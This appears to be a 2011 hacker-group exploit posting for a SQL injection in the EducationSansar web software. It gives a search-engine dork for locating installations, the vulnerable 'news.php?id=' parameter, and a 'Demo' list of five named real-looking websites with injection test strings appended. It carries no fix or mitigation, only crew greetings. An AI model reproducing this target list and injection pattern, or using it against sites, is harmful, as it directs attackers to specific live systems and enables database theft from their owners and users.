EducationSansar suffers from a remote SQL injection vulnerability.
68654674d864bd6f06fe2caf4eb520bb5abb36ffb840db619ae67a96b5c8fb14
############################################################################
# Exploit Title: EducationSansar SQL Injection Vulnerability
# Google Dork: Powered by: EducationSansar.com
# Date: 30/12/2011
# Author: H4ckCity Security Team
# Discovered By: farbodmahini
# Home: WwW.H4ckCity.Org
# Software Link: http://www.educationsansar.com
# Version: All Version
# Security Risk::High
# Tested on: GNU/Linux Ubuntu - Windows Server
############################################################################
# Exploit:
#
# http://target.com/[path]/news.php?id=1[SQLi]
#
# Demo:
#
# www.missglobal.com.np/news.php?id=27'
# www.galaxy.edu.np/pages/news.php?id=1'
# www.escreation.com.np/news.php?id=16'
# www.missmangol.com/news.php?id=1'
# www.moviehousenepal.com/news.php?id=13'
#
#
############################################################################
# Special Thanks : Mehdi.H4ckcity-2MzRp-Mikili-M.Prince-Bl4ck.Viper-iC0d3R-
# IrIsT-K0242-P0W3RFU7-Mr.M4st3r , ...
############################################################################
GreetZ : All H4ckCity Member - BHG members
############################################################################